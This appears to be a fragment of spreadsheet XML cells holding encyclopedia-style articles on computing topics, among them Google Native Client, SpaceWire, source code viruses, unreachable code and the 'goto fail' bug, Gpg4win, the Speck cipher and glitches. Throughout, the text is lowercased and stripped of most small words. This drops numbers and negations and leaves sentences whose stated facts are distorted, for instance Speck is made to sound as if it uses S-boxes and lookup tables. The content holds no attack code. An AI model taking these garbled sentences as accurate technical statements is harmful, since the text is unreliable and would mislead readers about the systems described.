bytecode. executables called pnacl executables (pexes). pnacl toolchain makes .pexe files; nacl toolchain .nexe files. magic number .nexe files 0x7f 'f', elf. chrome, translated architecture-specific executables run. nacl uses software fault detection isolation sandboxing x86-64 arm. x86-32 implementation native client notable novel sandboxing method, makes architecture's rarely used segmentation facility. native client sets segments restrict memory range sandboxed code access. uses code verifier prevent unsafe instructions perform system calls. prevent code jumping unsafe instruction hidden middle safe instruction, native client requires indirect jumps jumps start 32-byte-aligned blocks, instructions allowed straddle blocks. because constraints, code must recompiled native client, provides customized versions toolchain, specifically compiler collection (gcc), binutils, llvm. native client licensed bsd-style license. native client uses newlib library, port library (gnu libc) also available. pepper nacl denotes sodium chloride, common table salt; pun, name pepper also used. pepper cross-platform, open-source creating native client modules. pepper plugin api, ppapi cross-platform native client-secured browser plugins, first based netscape's npapi, rewritten scratch. currently used chromium google chrome enable ppapi version adobe flash built-in viewer. ppapi august 2009, page google code introduced project, pepper, associated pepper plugin (ppapi), modifications npapi make plugins portable secure". this extension designed specifically ease implementing out-of-process plugin execution. further, goals project provide framework making plugins fully cross-platform. topics considered include: uniform semantics npapi across browsers. execution separate process renderer-browser. standardize rendering using browser's compositing process. defining standardized events, rasterizing functions. initial attempt provide graphics access. plugin registry.the pepper also supports gamepads (version websockets (version 18).as 2010, google's open source browser, chromium, browser browser plug-in model. 2020, pepper supported chrome, chromium blink layout engine-based browsers opera microsoft edge. august 2020, google announced support ppapi would removed google chrome chromium june 2022. ppapi firefox firefox developers stated 2014 would support pepper, full specification beyond implementation chrome, designed blink layout engine only, private apis specific flash player plugin documented. october 2016 mozilla announced re-considered exploring whether incorporate pepper pdfium future releases firefox, however steps taken. applications website uses nacl server users experiment programming language browsers. reception some groups browser developers support native client technology, others not. supporters chad austin imvu) praised native client bring high-performance applications (with penalty compared native code) secure way, also accelerating evolution client-side applications giving choice programming language used (besides javascript).id software's john carmack praised native client quakecon 2012, saying: something inside browser, native client much interesting something started really pretty darn clever hack could sandbox user mode interestingly. it's dynamic recompilation, something program compiles something that's going optimization level completely native code pretty damn close native code. could evil pointer chasings, whatever want to-the-metal game developer." detractors other professionals critical sandboxing technology substantial substantive interoperability issues. mozilla's vice president products, sullivan, said mozilla plans native code inside browser, "these native apps little black boxes webpage. [...] really believe html, want focus."mozilla's christopher blizzard criticized nacl, claiming native code cannot evolve source code-driven can. also compared nacl microsoft's activex technology, plagued hell.håkon wium lie, opera's cto, believes "nacl seems 'yearning days, web'", "native client building platform porting platform [...] bring complexity security issues, take away focus platform." second generation second generation sandboxing developed google gvisor. intended replace nacl google cloud, exact google engine. google also promoting webassembly. also application virtualization emscripten sandboxie, running windows programs sandbox webassembly, bytecode standard browsers xaml browser applications (xbap) references external links official website "issues nativeclient". bugs.chromium.org. retrieved july 2022. google 2013 introduction portable native client (pnacl) youtube google 2009 native code compute intensive apps youtube technical talk google 2009 list projects ported native client native client source code examples folding@home pnacl examples (runs chrome 31+, pnacl, i.e. installation needed) native client gallery torapp.info, vector editor, especially powerful security printing (not pnacl) naclbox, port dosbox native client (pnacl) sodasynth, synthesizer native client (not pnacl) pnacl-amiga-emulator, port uae, amiga emulator abadía crimen, port version vigasoco (remake abadía crimen) native client (pnacl) bennugd, port bennugd videogames examples native client (pnacl)</t>
  </si>
  <si>
    <t>SpaceWire</t>
  </si>
  <si>
    <t>spacewire spacecraft communication network based part ieee 1355 standard communications. coordinated european space agency (esa) collaboration international space agencies including nasa, jaxa, rka. within spacewire network nodes connected low-cost, low-latency, full-duplex, point-to-point serial links, packet switching wormhole routing routers. spacewire covers (physical data-link) seven layers model communications. architecture physical layer spacewire's modulation data formats generally follow data strobe encoding differential ended signaling (ds-de) part ieee 1355-1995. spacewire utilizes asynchronous communication allows speeds mbit/s mbit/s, initial signalling rate 10mbit/s. ds-de well-favored describes modulation, formats, routing, flow control, error detection hardware, little need software. spacewire also error rates, deterministic system behavior, relatively simple digital electronics. spacewire replaced pecl differential drivers physical layer ieee 1355 ds-de low-voltage differential signaling (lvds). spacewire also proposes space-qualified 9-pin connectors. spacewire ieee 1355 ds-de allows wider speeds data transmission, features automatic failover. fail-over features data find alternate routes, spacecraft multiple data buses, made fault-tolerant. spacewire also allows propagation time interrupts spacewire links, eliminating need separate time discretes. link layer each transferred character starts parity data-control flag bit. data-control flag 0-bit, 8-bit character follows. otherwise control codes, including packet (eop). network layer network data frames look follows: address bytes used routing. addresses either physical ones (0-31), logical ones. difference physical addresses deleted frame header routing used hop-based routing (based path specified frame itself). logical addresses deleted well, depending router configuration. interconnection hardware devices connected either directly, spacewire router. former case, usually pairs devices used guarantee fail-safe operation however handled software. spacewire router usually crossbar switch-type device, operating wormhole switching mode. this also limit speed communication lowest common speed. routing decisions based programmed routing table initial incoming frame contents. uses spacewire used around globe. began primarily projects, currently used nasa, jaxa, rka, many organizations companies. some nasa projects using include james webb space telescope, swift's burst alert telescope, lunar reconnaissance orbiter, lcross, geostationary operational environmental satellite (goes-r), scan testbed, previously known communications, navigation, networking reconfigurable testbed (connect). also selected united states department defense operationally responsive space. spacewire initiatives coordinated several space agencies frame ccsds order extend communication model network transport layers model. spacewire supports highly fault-tolerant networks systems, reason popularity. protocols draft specification place protocol following protocol id's assigned ecss-e-st-50-11: references other sources ecss-e-st-50-12c spacewire links, nodes, routers, networks, esa-estec. ecss-e-50-12a (superseded document number changed ecss-e-st-50-12c) spacewire nodes, links, networks, esa-estec. ecss-e-st-50-11c draft "space engineering spacewire protocols" external links spacewire homepage (esa) european cooperation space standardisation ecss 4links publications international spacewire conference 2007 international spacewire conference 2008 international spacewire conference 2010 international spacewire conference 2011 international spacewire conference 2013 star-dundee knowledge database http://www.interfacebus.com/spacewire_avionics_bus.htmlcommercial providers spacewire equipment: star-dundee spacewire.fr aeroflex aeroflex gaisler astrium microchip aurelia microelettronica ingespace dynamic engineering 4links skylab industries ruag space innovations teletel tttech gateway spacewire 1gbe ethernet, leon-2ft cpuspacewire cores: 4links star-dundee aeroflex gaisler astrium spacewire rmap irfu cesr cnrs (cecill-c license) nasa goddard tech transfer opencores.org (spacewire spacewire light) spacewire european space agency innovationsarticles: nasa article spacewire used james webb space telescope</t>
  </si>
  <si>
    <t>Source code virus</t>
  </si>
  <si>
    <t>source code viruses subset computer viruses make modifications source code located infected machine. source file overwritten includes call malicious code. targeting generic programming language, source code viruses portable. source code viruses rare, partly difficulty parsing source code programmatically, reported exist. virus (w32/induc-a) identified anti-virus specialist sophos capable injecting source code delphi program finds infected computer, compiles finished executable. notes references</t>
  </si>
  <si>
    <t>Goto fail</t>
  </si>
  <si>
    <t>computer programming, unreachable code part source code program never executed exists control flow path code rest program.unreachable code sometimes also called dead code, although dead code also refer code executed effect output program.unreachable code generally considered undesirable several reasons: uses memory unnecessarily cause unnecessary cpu's instruction cache this also decrease data locality time effort spent testing, maintaining documenting code never used sometimes automated test thing using code.however, unreachable code legitimate uses, like providing library functions calling jumping manually debugger program halted breakpoint. this particularly useful examining pretty-printing internal state program. make sense code shipped product, developer attach debugger client's running instance. causes unreachable code exist many reasons, programming errors complex conditional branches consequence internal transformations performed optimizing compiler; incomplete testing modified code legacy code code superseded another implementation unreachable code programmer decided delete mingled reachable code potentially reachable code current cases never need dormant code kept intentionally case needed later code used debugging.legacy code useful longer used required. unreachable code also part complex library, module routine useful others conditions particular scenario. example conditionally unreachable code implementation general string formatting function compiler's runtime library, contains complex code process possible arguments, small subset actually used. compilers typically able remove unused code sections compile time, behavior largely determined values arguments time. examples fragment code: definition never reached function always returns therefore, need neither allocated storage initialized. goto fail apple's ssl/tls february 2014 contained major security flaw known formally cve-2014-1266 informally "goto fail bug". relevant code fragment here, successive calls goto fail. syntax language, second unconditional, hence always skips call sslhashsha1.final. consequence, hold status sha1 update operation, signature verification never fail.here, unreachable code call final function. applying clang compiler option -weverything includes unreachable code analysis, would trigger alarm code. c++, constructs specified undefined behavior. compiler free implement behavior none, typically optimizing compiler assume code unreachable. analysis detection unreachable code form control flow analysis find code never reached possible program state. languages (e.g. java) forms unreachable code explicitly disallowed. optimization removes unreachable code known dead code elimination. code become unreachable consequence transformations performed optimizing compiler (e.g., common subexpression elimination). practice sophistication analysis significant impact amount unreachable code detected. example, constant folding simple flow analysis shows inside if-statement following code unreachable: however, great deal sophistication needed work corresponding block unreachable following code: unreachable code elimination technique class optimizations dead code elimination redundant code elimination. unreachability profiling cases, practical approach combination simple unreachability criteria profiler handle complex cases. profiling general prove anything unreachability piece code, good heuristic finding potentially unreachable code. once suspect piece code found, methods, powerful code analysis tool, even analysis hand, could used decide whether code truly unreachable. also code coverage redundant code dead code oxbow code references appel, 1998 modern compiler implementation java. cambridge university press. muchnick 1997 advanced compiler design implementation. morgan kaufmann.</t>
  </si>
  <si>
    <t>Goverlan Systems Management</t>
  </si>
  <si>
    <t>goverlan reach systems management remote support software created distributed goverlan, inc. goverlan on-premises client management software designed medium large enterprises remote control, active directory management, global configuration change management, reporting within windows infrastructure. history goverlan reach, primary product goverlan, inc. conceived created 1996 result working investment bank york city help-desks worldwide. product later commercialized goverlan incorporated 1998. features goverlan reach remote support software used remote support, process automation, management, software installation, inventory, remote control. other features include: displaying system information, mapping printers, wake-on-lan settings. remote control goverlan reach remote desktop support software option specialists. goverlan allows remote control desktop sharing. with goverlan, administrators remote shadow multiple client sessions single pane multiple administrators participate single remote control session. addition, administrator capture screenshots video recordings remote session. there other features goverlan remote control supports remote assistance ability connect computers internet, transfer files, view multiple sessions screen control bandwidth used remote session. goverlan supports citrix xenapp microsoft terminal services shadowing. behind-the-scenes systems management goverlan administration diagnostics tool integrates existing active directory (ad) organization unit (ou) structure windows systems management. goverlan perform remote administration single machine, group machines, entire domain. goverlan compatible vdi, rdp, citrix deployments. global process automation goverlan process automation module allows administrators manage various objects software updates, reports generation, adding removing registry keys, actions applied single computer network. scope actions allow administrators execute configuration management tasks client machines, query machines, collect information user logged-in machines, hardware, software, processes, remote monitor workstations real time, opposed retrieving information database. administrators also goverlan patch management push patches servers workstations. wmix wmix goverlan free explorer generates queries using wizard exports custom queries windows. wmix tool makes pre-existing windows management instrumentation scripts within interface. technician generate vbscript defining parameters clicking generate script button. technologies ldap lightweight directory access protocol used goverlan active directory integration. windows management instrumentation technology used goverlan expose agent-free systems management services windows systems. intel vpro intel active management technology allows out-of-band management intel vpro ready systems regardless system's power state. security goverlan systems management software provides following security features: encryption (windows vista later) encryption (windows earlier). microsoft security support provider interface technology (sspi) securely authenticates identity person initiating connection. sspi also used impersonate identity person client machine. using identity privileges person initiated remote control session, remote control session either authorized rejected. central machine level auditing executed remote control sessions. agents communicate single, encrypted port. limitations goverlan's desktop software installed windows based computers (windows above). goverlan client agents installed windows based computers (windows 2000 above) goverlan requires installation client agents. however, client agents installed network rather independently. also remote support list systems management systems comparison remote desktop software remote desktop software desktop sharing references external links goverlan, inc. official site</t>
  </si>
  <si>
    <t>Gpg4win</t>
  </si>
  <si>
    <t>gpg4win email file encryption package versions microsoft windows microsoft outlook, utilises gnupg framework symmetric public-key cryptography, data encryption, digital signatures, hash calculations etc. history gpg4win original creation gpg4win initiated funded germany's federal office information security (bsi) 2005 2006, resulting release gpg4win 1.0.0 april 2006; however gpg4win included tools free open source software, typically non-proprietary option privacy recommended windows users. gpg4win much overhauled derivate gnupp, using gnupg cryptographic operations thus supported openpgp cryptography standard. hence 2007 development fundamentally enhanced version started, also support german (federal office information security); effort culminated release gpg4win 2.0.0 august 2009 protracted beta testing phase, based gnupg 2.0, included s/mime support, kleopatra certificate manager, explorer plug-in gpgex cryptography operations files, basic support smart cards, full german dialogue texts addition english ones, manuals english german, plus many enhancements.in contrast gpg4win focused features software components, development gpg4win focused usability, plus consolidation code features: this resulted release gpg4win 3.0.0 september 2017 proper support elliptic curve cryptography (ecc) utilising gnupg (instead 2.0), broadened, stabilised enhanced smart card support, fundamentally overhauled outlook plug-in gpgol outlook 2010 newer, support 64-bit versions outlook 2010 newer, supporting dialogues languages supports etc.gpg4win 4.0.0, released december 2021, switched using gnupg (from 2.2) continued refine enhance feature gpg4win also distributed gnupg vs-desktop commercial support approval handling nato restricted, restreint ue/eu restricted german vs-nfd documents, turn become major source revenue maintaining developing gnupg framework gpg4win. contents gpg4win installer gnupg: core cryptography framework certificate managers kleopatra: certificate manager openpgp x.509 gpa: alternative certificate manager (gnu) openpgp x.509 plug-ins email file cryptography gpgol: plug-in microsoft outlook provide email encryption signing gpgex: plug-in windows explorer provide file encryption, signing hash calculations gpg4win compendium: introduction encryption (openpgp x.509) user manual gpg4win also e-mail privacy references external links official website</t>
  </si>
  <si>
    <t>GrafX2</t>
  </si>
  <si>
    <t>grafx2 bitmap graphics editor inspired amiga programs deluxe paint brilliance. free software distributed gpl-2.0-or-later license. history grafx2 ms-dos program developed sunset design 1996 2001 distributed freeware, used graphics editor demoscene. development stopped lack time developers. released sourcecode gpl-2.0-or-later license.a windows port done eclipse demogroup presented state party 2004, sourcecode version seem available anywhere. 2007, project started port sourcecode original ms-dos version simple directmedia layer library. goal provide pixel editing tool linux, also allowed easy ports many platforms, including windows. project development continued version features missing original opensource release first windows port. features specificities what made grafx2 interesting released 1996 ability display pictures resolutions available amiga. this allowed program picture viewer users. this done level programming video card, using x-modes combined vesa settings. port generally runs platforms high resolution screens, software scaling emulate resolutions. scaling options include several non-square pixels, allows editing pictures displaying 8-bit microcomputers, video modes. versions program designed drawing indexed color mode, colors. palette editor allows precise operations image palette. these functions precious console mobile game graphics specific color indices palette required special effects: palette swap, color cycling, transparent color sprites. user interface mouse-driven toolbar common tools, modal dialog windows. increased productivity frequently used functions, extensive system keyboard shortcuts available. user split editing area normal size left, zoomed-in view right. drawing zoomed area allows finer mouse control. basic drawing concepts clearly inspired deluxe paint, involve brush it's built-in monochrome shape, piece colored bitmap grabbed user. brush appears 'stuck' mouse cursor, gives accurate preview. tool pastes brush image several places freehand drawing, straight line, circle, curve, airbrush... optionally, number effects change pixels drawn: example, shade mode ignores brush color, lightens darkens picture depending mouse button used (and depending user-defined color ranges). some effects classic 24bit drawing program (transparency, smoothing, smearing), effectiveness grafx2 limited according colors pre-defined palette.the port currently runs computer systems, tested common systems linux, freebsd, windows, macos, less common ones amigaos 68k, amigaos ppc, beos haiku, morphos ppc, aros x86, skyos, atari mint atari falcon030 atari even ported handheld game console gp2x, windows version used ms-dos thru extender. relation demoscene first release grafx2 done wired demoparty. tool primarily made demomakers. this explains presence features specific computers, demosceners often kind hardware. today, program mostly used pixel art, necessarily relation demos limited hardware. supported file formats (sunset design) (this custom format used grafx2. done first version easy save pictures, format managed perfectly.) (microsoft, file format) cel, (k.o.s. kisekae system) (compuserve) (bivas) (electronic arts) (support files deluxe paint, also amiga paint programs) (z-soft) pi1, (degas elite) (portable network graphics) (only windows ports) (colorix) (neochrome) picture formats (koala painter, cdu-paint, fli, etc.) picture formats (pph, cm5, etc.) jpeg (only loading) (truevision loading) tiff (aldus corporation) recoil used load native file formats vintage computers. also list raster graphics editors comparison raster graphics editors references external links project homepage source code repository grafx2 windows (this port original code used anymore) linux packages: debian, ubuntu</t>
  </si>
  <si>
    <t>Sparse image</t>
  </si>
  <si>
    <t>sparse image type disk image file used macos grows size user adds data image, taking much disk space stored encrypted sparse image files used secure user's home directory filevault feature snow leopard earlier. sparse images created using disk utility. unlike full image file (.dmg), takes much actual space real disk represents (regardless amount unused space), sparse image file (.sparseimage) takes much actual disk space data contained within, maximum capacity assigned creation. limitations limitations therefore worth noting regarding image file format: customized ".sparseimage" image file assigned larger total capacity physical volume partition) originally resides. while virtual volume seem make capacity available, attempting exceed physical capacity underlying volume result disk error: "ran space". .sparseimage file must first moved larger physical disk partition. noted above, mounted .sparseimage image files automatically expand preassigned limit data added, cannot arbitrarily resized without disk utility, hdiutil, software. sparse bundle disk images leopard introduced concept sparse bundle. instead single file, sparse bundle bundle (directory) containing number files called bands, order size. this means even though user sparse bundle appears single file, composed smaller files. 10.8, bands 10242 byte) each. when content image changes, band files changed, created, deleted. this allows easier shrinking amount space used underlying filesystem large amount data deleted inside disk image, long code supporting filesystem inside image notifies kernel "releasing" blocks, happens filesystems support "trim" operations triggered automatically de-allocated filesystem blocks. sparse bundle advantages non-diskimage backup time machine: backup destination longer needs hfs+/hfsx volume (for hard links work preserve metadata), shared folder, server, connected using protocol using file system store actual files entire sparse bundle replicable location another; particularly useful upgrading backup storage on-site backup storage needs replicated off-site backup storage. tool rsync used keep disk images consistent across various systems. references external links sparsebundlefs github fuse filesystem reading macos sparse-bundle disk images</t>
  </si>
  <si>
    <t>Solaris Trusted Extensions</t>
  </si>
  <si>
    <t>solaris trusted extensions security extensions incorporated solaris operating system microsystems, featuring mandatory access control model. succeeds trusted solaris, family security-evaluated operating systems based earlier versions solaris. solaris 5/09 common criteria certified evaluation assurance level eal4+ capp, rbacpp, lspp protection profiles. overview certain trusted solaris features, fine-grained privileges, part standard solaris release. beginning solaris 11/06, solaris includes component called solaris trusted extensions gives additional features necessary position successor trusted solaris. inclusion features mainstream solaris release marks significant change trusted solaris, longer necessary different solaris release modified kernel labeled security environments. solaris trusted extensions opensolaris project. trusted extensions additions enhancements include: accounting role-based access control auditing device allocation mandatory access control labelingsolaris trusted extensions enforce mandatory access control policy aspects operating system, including device access, file, networking, print window management services. this achieved adding sensitivity labels objects, thereby establishing explicit relationships objects. only appropriate (and explicit) authorization allows applications users read and/or write access objects. component also provides labeled security features desktop environment. apart extending support common desktop environment trusted solaris release, delivers first labeled environment based gnome. solaris trusted extensions facilitate access data multiple classification levels single desktop environment. solaris trusted extensions also delivers labeled device access labeled network communication (through cipso standard). cipso used pass security information within labeled zones. solaris trusted extensions complies federal information processing standard (fips). trusted solaris history 2000 trusted solaris common criteria evaluated: capp, rbacpp, lspp eal4+ 1999 trusted solaris 1996 trusted solaris 2.5.1 itsec certified f-b1 1995 trusted solaris itsec certified f-b1 1992 sunos compartmented mode workstation itsec certified f-b1 1990 sunos multilevel security tcsec conformance (1985 orange book) references external links solaris trusted extensions official website opensolaris: solaris trusted extensions project solaris trusted extensions press release solaris curlie</t>
  </si>
  <si>
    <t>Speck (cipher)</t>
  </si>
  <si>
    <t>speck family lightweight block ciphers publicly released national security agency (nsa) june 2013. speck optimized performance software implementations, sister algorithm, simon, optimized hardware implementations. speck add–rotate–xor (arx) cipher. began working simon speck ciphers 2011. agency anticipated agencies federal government would need cipher would operate well diverse collection internet things devices maintaining acceptable level security. cipher description speck supports variety block sizes. block always words, words bits size. corresponding words. round function consists rotations, adding right word left word, xoring left word, xoring left word right word. number rounds depends parameters selected, follows: schedule uses round function main block cipher. reference code following designers' reference implementation, written speck variant 128-bit block size key, (k[1], k[0]). adapted iacr eprint. note code computes round keys (key schedule) on-demand. practice, block ciphers common implementations compute round keys cache them, rather recomputing every block encrypted decrypted. although, authors point out, "given small code size major goal design, made sense reuse round function round generation. this approach enables on-the-fly round generation microcontroller implementations, using round function code, little rom, beyond required hold plaintext."for 16-bit words (speck32), rotates bits right bits left; word sizes, shown here. words long, values, used rotation. endianness original speck paper explicitly state endianness bytes plaintext block interpreted words used cipher algorithm. test vectors given paper suggest big-endian order. however, authors algorithm advised implementers little-endian byte order used keys, plaintext, ciphertext, practice accepted others. performance according ecrypt's stream cipher benchmarks (ebasc), speck fastest ciphers available, long well short messages. some median performances long messages (128-bit, 128-block size version) are: 1.99 cycles byte (cpb) ryzen 1700; 1.27 intel core i5-6600; 15.96 broadcom bcm2836 cortex example, armv7 platform, speck times faster aes.when implemented 8-bit microcontroller, speck encryption 64-bit blocks 128-bit consumes bytes flash memory, temporary variables consume bytes ram, takes cycles encrypt byte block.salsa20 stream cipher comparable performance, difficult stream ciphers securely applications block ciphers like speck work well. this google implementation speck linux kernel version 4.17, planning offer option disk encryption low-end android devices would otherwise unencrypted slow performance processors lack instructions. speck later dropped linux kernel backlash concerns, google switched adiantum algorithm instead. security cryptanalysis designers claim speck, though "lightweight" cipher, designed full security possible block size, standard chosen-plaintext (cpa) chosen-ciphertext (cca) attacks. resistance related-key attacks also stated goal, though less crucial attacks model relevant typical cases.: effort made resist attacks known-key distinguishing attack model, designers evaluate speck hash function.: 2018, successful attack full-round speck variant known. interest simon speck, cryptanalysis papers published them.: typical iterated ciphers, reduced-round variants successfully attacked. best published attacks speck standard attack model (cpa/cca unknown key) differential cryptanalysis attacks; make 70–75% rounds variants, though best attacks marginally faster brute-force.: design team states designing speck, found differential attacks limiting attacks, i.e. type attack makes rounds; number rounds leave security margin similar aes-128's approximately 30%.: 12–13 speck criticized small security margin, i.e. rounds best attacks full cipher, comparison conservative ciphers chacha20. ciphers small security margins likely broken future advances cryptanalysis. speck's design team counters real-world cost unnecessarily large security margins, especially lightweight devices, cryptanalysis design phase allowed number rounds appropriately, targeted aes's security margin.: speck includes round counter schedule. designers state included block slide rotational cryptanalysis attacks.: still, rotational-xor cryptanalysis used find distinguishers reduced-round versions speck. though authors describe standard key-recovery attacks based distinguishers, best distinguishers speck32 speck48 known-key distinguishing attack model certain weak classes make slightly rounds best differential distinguishers. authors said research resource-constrained rotational-xor distinguishers rounds probably possible. however, type cryptanalysis assumes related-key even known-key attack models, concern typical cryptographic protocols solutions.: designers also state speck designed resist known-key distinguishing attacks (which directly compromise confidentiality ciphers).: designers state cryptanalysis found algorithms weaknesses, security commensurate lengths.: design team says cryptanalysis included linear differential cryptanalysis using standard techniques matsui's algorithm sat/smt solvers, though full list techniques used given.: speck's designers criticized providing details cryptanalysis ciphers.the approved simon128/256 speck128/256 u.s. national security systems, though aes-256 still recommended non-constrained applications. side-channel attacks being cipher, speck s-boxes lookup tables; therefore naturally immune cache-timing attacks.: this contrasts ciphers lookup tables aes, shown vulnerable attacks. however, like block ciphers (including aes) speck vulnerable power analysis attacks unless hardware countermeasures taken.: block sizes although speck family ciphers includes variants block sizes (speck128/128, speck128/192, speck128/256), also includes variants block size bits size bits. these small block sizes insecure general use, allow birthday attacks brute-force attacks, regardless formal security cipher. designers state block sizes included highly resource-constrained devices nothing better possible, small amounts data ever encrypted, e.g. rfid protocols.: only variant 128-bit block size 256-bit size approved u.s. national security systems. standardization efforts controversies initial attempts standardise simon speck failed meet international organization standardization super-majority required process ciphers adopted. expert delegates several countries including germany, japan israel opposed efforts standardise simon speck ciphers, citing concerns pushing standardisation knowledge exploitable weaknesses ciphers. position based partial evidence weaknesses ciphers, lack clear need standardisation ciphers, nsa's previous involvement creation promotion backdoored dual_ec_drbg cryptographic algorithm.in response concerns, stated security analysis papers world's leading cryptographers support nsa's conclusion algorithms secure affirmed aware cryptanalytic techniques would allow anyone else exploit simon speckafter initial attempts standardise ciphers failed, standardised simon speck working groups. october 2018, simon speck ciphers standardized part rfid interface standard, international standard iso/29167-21 (for simon) international standard iso/29167-22 (for speck), making available commercial entities.on august 2018, speck removed linux kernel 4.20 release completely. references</t>
  </si>
  <si>
    <t>Glitch</t>
  </si>
  <si>
    <t>glitch short-lived fault system, transient fault corrects itself, making difficult troubleshoot. term particularly common computing electronics industries, circuit bending, well among players video games. more generally, types systems including human organizations nature experience glitches. glitch, slight often temporary, differs serious genuine functionality-breaking problem. alex pieschel, writing arcade review, said: "'bug' often cast weightier blameworthy pejorative, 'glitch' suggests something mysterious unknowable inflicted surprise inputs stuff outside realm code." etymology some reference books, including random house's american slang, claim term comes german word glitschen ("to slip") yiddish word glitshn ("to slide", skid"). either way, relatively term. first widely defined american people bennett cerf june 1965, episode what's line kink anything goes wrong [cape kennedy], there's slight glitch." astronaut john glenn explained term section book into orbit, writing another term adopted describe problems "glitch." literally, glitch spike change voltage electrical circuit takes place circuit suddenly load probably noticed dimming lights home turn switch start dryer television set. normally, changes voltage protected fuses. glitch, however, minute change voltage fuse could protect john daily defined word july 1965, episode show, saying term used force cape kennedy, process launching rockets, means something's gone wrong can't figure call 'glitch'." later, july 1965, time magazine felt necessary define article: "glitches—a spaceman's word irritating disturbances." relation reference time, term believed enter common usage american space race 1950s, used describe minor faults rocket hardware difficult pinpoint. according wall street journal article written zimmer, yale librarian fred shapiro came earliest word found: 1940. that novelist katharine brush wrote glitch column "out mind" (syndicated washington post, boston globe, papers). brush corroborated tony randall's radio recollection:when radio talkers make little mistake diction call "fluff," make call "glitch," love it.other examples world radio found 1940s. april 1943, issue washington post carried review helen sioussat's book radio broadcasting, mikes don't bite. reviewer noted error wrote, lingo radio, miss sioussat pulled 'muff,' 'fluff,' 'bust,' 'glitch'?" 1948 book called advertising business side radio, midgley explained radio station's "traffic department" responsible properly scheduling items broadcast. "usually 'glitches,' on-the-air mistakes called, traced mistake part traffic department", midgley wrote. further digging reveals 1950s, glitch made transition radio television. 1953 broadcasting magazine, boasted camera power line 'glitches' (horizontal-bar interference)." bell telephone 1955 issue billboard showing technicians monitoring signals broadcast bell system lines: "when talks 'glitch' fellow technician, means frequency interference appears narrow horizontal moving vertically picture." 1959 article sponsor, trade magazine television radio advertisers, gave another technical usage article editing commercials splicing tape. "'glitch' slang 'momentary jiggle' occurs editing point sync pulses match exactly splice." also provided earliest etymologies word, noting that, "'glitch' probably comes german yiddish word meaning slide, glide slip." electronics glitch electronics glitch logic hazard transition occurs signal signal settles intended value, particularly digital circuit. generally, implies electrical pulse short duration, often race condition signals derived common source different delays. cases, well-timed synchronous circuit, could harmless well-tolerated effect occurs normally design. contexts, glitch represent undesirable result fault design error produce malfunction. some electronic components, flip-flops, triggered pulse must shorter specified minimum duration order function correctly; pulse shorter specified minimum called glitch. related concept runt pulse, pulse whose amplitude smaller minimum level specified correct operation, spike, short pulse similar glitch often caused ringing crosstalk. computer glitch computer glitch failure system, usually containing computing device, complete functions perform properly. public declarations, glitch used suggest minor fault soon rectified therefore used euphemism bug, factual statement programming fault blame system failure. frequently refers error detected time occurs shows later data errors incorrect human decisions. situations frequently called computer glitches incorrectly written software (software bugs), incorrect instructions given operator (operator errors, failure account possibility might also considered software bug), undetected invalid input data (this might also considered software bug), undetected communications errors, computer viruses, trojan attacks computer exploiting (sometimes called "hacking"). such glitches could produce problems keyboard malfunction, number failures, screen abnormalities (turned left, right upside-down), random program malfunctions, abnormal program registering. examples computer glitches causing disruption include unexpected shutdown water filtration plant canaan, 2010, failures computer aided dispatch system used police austin, resulting unresponded calls, unexpected flip causing cassini spacecraft enter "safe mode" november 2010. glitches also costly: 2015, bank unable raise interest rates weeks resulting losses million dollars day. video game glitches glitches/bugs software errors cause drastic problems within code, typically unnoticed unsolved production said software. these errors game caused otherwise exploited developer/development team repairs patches. complex software rarely bug-free otherwise free errors upon first release. there different kinds glitches, affect different aspects game: texture/model glitches kind error causes specific model texture either become distorted otherwise look intended developers. bethesda's elder scrolls skyrim notorious texture glitches, well errors affect many company's popular titles. many games ragdoll physics character models glitches happen them. physics glitches errors game's physics engine causes specific entity, physics object non-player character, unintentionally moved degree. these kinds errors exploited, unlike many. chance physics error happening either entirely random accidentally caused, notoriously developed 2006 sonic hedgehog reboot launch player character significant distance coming contact particular crate particular way. sound glitches prevent sounds playing properly way. these range sounds playing intended play even playing all. occasionally, certain sound loop otherwise player given option continuously play sound intended. often, games play sounds incorrectly corrupt data altering values predefined code. examples include, limited extremely high pitched sounds, volume mute high understand, also rarely even playing reverse order/playing reversed.glitches missingno. pokémon games include incorrectly displayed graphics, collision detection errors, game freezes/crashes, sound errors, issues. graphical glitches especially notorious platforming games, malformed textures directly affect gameplay (for example, displaying ground texture code calls area damage character, displaying wall texture one, resulting invisible wall). some glitches potentially dangerous game's stored data."glitching" practice players exploiting faults video game's programming achieve tasks give unfair advantage game, npc's players, running walls defying game's physics. glitches deliberately induced certain home video game consoles manipulating game medium, tilting cartridge disconnect connections along edge connector interrupt part flow data cartridge console. this result graphic, music, gameplay errors. doing this, however, carries risk crashing game even causing permanent damage game medium.heavy glitches often used performing speedrun video game. type glitch often used speedrunning stack overflow, referred "overflowing". another type speedrunning glitch, almost impossible humans mostly made tool assisted speedruns, arbitrary code execution cause object game something outside intended function.part quality assurance process performed game testers video games) locating reproducing glitches, compiling reports glitches back programmers repair bugs. certain games cloud-type system updates software used repair coding faults errors games.some games purposely include effects look like glitches means break fourth wall either scare player player unease, otherwise part game's narrative. games like eternal darkness batman: arkham asylum include segments intentional glitches appears player's game system failed. animus interface assassin's creed series, allows player-character experience memories ancestor though generic heritage, includes occasional glitches enforce idea game player-character witnessing computer-aided system. five nights freddys: help wanted mobile 'glitches' need unlock minigame. glitches also found electronic toys. example, 2013, hasbro released game called beats. discovered several players expert lights only modes give players fail sound upon reaching pattern actions completing successfully. difficult modes completed party mode long "pass last patterns. hasbro informed glitch discovered manufacture, longer update upgrade existing units. foreign versions game, however, shipped glitch already patched. glitches games confused exploits. despite performing unintended actions, exploit programming error, instead oversight developers. (e.g. bunny hopping, repeatedly mashing jump button bypass movement limitations 2006 sonic hedgehog reboot taking advantage opponents online multiplayer games) television glitch broadcasting, corrupted signal glitch form jagged lines screen, misplaced squares, static looking effects, freezing problems, inverted colors. glitches affect video and/or audio (usually audio dropout) transmission. these glitches caused variety issues, interference portable electronics microwaves, damaged cables broadcasting center, weather. popular culture multiple works popular culture deal glitches; word "glitch" derivations thereof detailed glitch (disambiguation). nonfiction book bible (1976) includes glitch glossary citizens band radio slang, defining indefinable technical defect equipment", indicating term already citizens band. short film glitch (2008), opening film best science fiction finalist dragon independent film festival 2008, deals disorientation late-night viewer harry owen (scott charles blamphin), experiences "heavy brain-splitting digital breakdowns". also fuzzing glitch glitch removal glitching hazard (logic) hardware software references</t>
  </si>
  <si>
    <t>General Dynamics Mission Systems</t>
  </si>
  <si>
